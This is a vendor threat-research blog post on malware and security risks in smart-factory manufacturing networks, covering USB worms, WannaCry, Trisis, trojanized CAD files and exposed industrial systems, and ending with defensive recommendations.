by Matsukawa Bakuei, Ryan Flores, Vladimir Kropotov, and Fyodor Yarochkin (Threat Researchers)
The introduction of the use of cyber-physical systems (CPSs) in manufacturing — the revolution known as Industry 4.0 and typically embodied in so-called smart factories — is just one of the manifestations of how the industrial internet of things (IIoT) is improving processes, introducing efficiencies, and stirring innovation in established and emerging industries. Aside from transforming production processes by connecting factory systems with one another and with enterprise networks, this new era of connectivity urges Industry 4.0 adopters to reevaluate their security strategies for the convergence of information technology (IT), operational technology (OT), and intellectual property (IP).
The industrial sector is now finding a new kind of space to operate in, where physical and digital components intersect. But now that more devices and systems in the manufacturing network are getting connected, potential entry points for attacks are also increasing. In this post, we tackle the top malware detections in manufacturing networks, based on data from the Trend Micro™ Smart Protection Network™ infrastructure, review the common security threats to the manufacturing industry, and discuss how cybersecurity can be improved.
Attacks against IT networks
Figure 1. Detections of autorun.inf across industries, with manufacturing having the highest, based on data from the Trend Micro™ Smart Protection Network™ infrastructure for the period from July to December 2018
Manufacturing has the highest detections of autorun.inf across industries. Downad (aka Conficker) and other USB worms abuse autorun.inf by automatically executing it whenever an infected removable device is plugged in. This is a cause for concern considering the common practice in the industry of using USB drives to transfer information within and between the IT and OT networks. For instance, the infamous Stuxnet malware, which was designed to target a nuclear facility, was propagated via removable USB media (although the malware itself exploited a vulnerability in parsing shortcut files). Incidents such as Stuxnet show that attacks can be unwittingly facilitated by employees with infected external devices as well as deliberately carried out by actors with malicious objectives. And while attacks may be initiated in enterprise networks, the repercussions may extend to the control systems themselves.
In an example of how corporate IT networks can be targeted to attack manufacturing facilities, a ransomware attack against an aluminum manufacturer recently forced the company to revert to manual operations. But perhaps no ransomware in recent memory is more notorious than WannaCry, given its rapid spread and significant impact on corporate systems. The malware also affected industrial control systems (ICSs), by infecting computers that managed industrial control software. WannaCry is particularly noteworthy because it spreads using a flaw in the Server Message Block (SMB) protocol in the Microsoft Windows, without requiring any direct interaction with the user. Some industrial systems might be running Windows as their platform and using the SMB protocol to communicate, and they might have gotten affected by EternalBlue, the exploit that takes advantage of the SMB vulnerability in question. The lack of patching on machines — a factor aggravated in OT systems, where patching could prove more difficult — created a favorable environment for the propagation across networks.
Security of ICSs and IP assets
ICSs and industrial infrastructures are under constant threat from malicious actors looking to compromise critical processes. Unfortunately, not all ICSs were built and designed for the connectivity and threats of today. Hardware and protocols could be difficult to integrate; security controls may not be built in or may be retrofitted to old manufacturing systems. In fact, we’ve found exposed manufacturing machines online using the IoT search engine Shodan.
Figure 2. Exposed monitor for mixers and their temperature and speed numbers
Moreover, ICSs are by no means exempt from malware. In 2017, Trisis was uncovered as the first attack to target safety instrumented systems. It targeted Schneider Electric’s Triconex Safety Instrumented System solutions, which are widely used in Middle East’s energy industry. The attack notably caused the shutdown of the plant affected by the malware.
A breach in a manufacturing network could also have consequences to proprietary information such as copyrights, patents, trademarks, and trade secrets. Computer-aided design (CAD) or document files that contain digital blueprints of products and technical records can be taken advantage of by threat actors.
Figure 3. Malicious CAD file detections across industries, based on data from the Trend Micro Smart Protection Network infrastructure for the period from October to December 2018
We’ve found that manufacturing has the highest number of detections of malicious CAD files across industries. Attackers can trojanize CAD files by abusing the Visual Basic for Applications (VBA) functionality AutoLISP in the popular AutoCAD software. Poorly secured files could be used for industrial espionage, leakage of design data in the underground, and production of counterfeit products. Ultimately, breaches to IP could even shake customer and shareholder confidence.
Figure 4. Sites showing leaked CAD files pertaining to a popular smartphone
Securing manufacturing networks and connected production environments
Security in the era of Industry 4.0 is a collaborative effort across components concerning the IT, OT, and IP. Manufacturers who rise to the challenge of adopting Industry 4.0 should implement robust security protections built to protect physical and digital assets against cyberthreats and cyberattacks. Without the knowledge of the current threat landscape of the industry, systems and infrastructures are at risk of being left vulnerable to attacks, shutdown, or IP leakage.
Here are some security measures manufacturing organizations can take:
- Audit new and existing pieces of equipment in the organization. IT administrators should be able to work with operational engineers to monitor and understand what information is passed on in any network. This will be crucial for unifying IT, OT, and IP security for day-to-day visibility and incident response in case of an attack.
- Educate employees on security protocols. As in IT environments, employees also pose a risk to OT network security. Inform all staff of social engineering tactics or risky information-sharing behaviors to prevent breaches caused by lack of security awareness or human error.
- Employ domain or subnetwork restrictions. Restrict machines that can talk with one another to provide a level of isolation and control between corporate and production machines. Indicate which computers in the IT network should be able to access production machines.
Read our research paper, “Securing Smart Factories: Threats to Manufacturing Environments in the Era of Industry 4.0,” for a detailed look at the threat landscape of the manufacturing industry and our recommended security measures for manufacturing environments.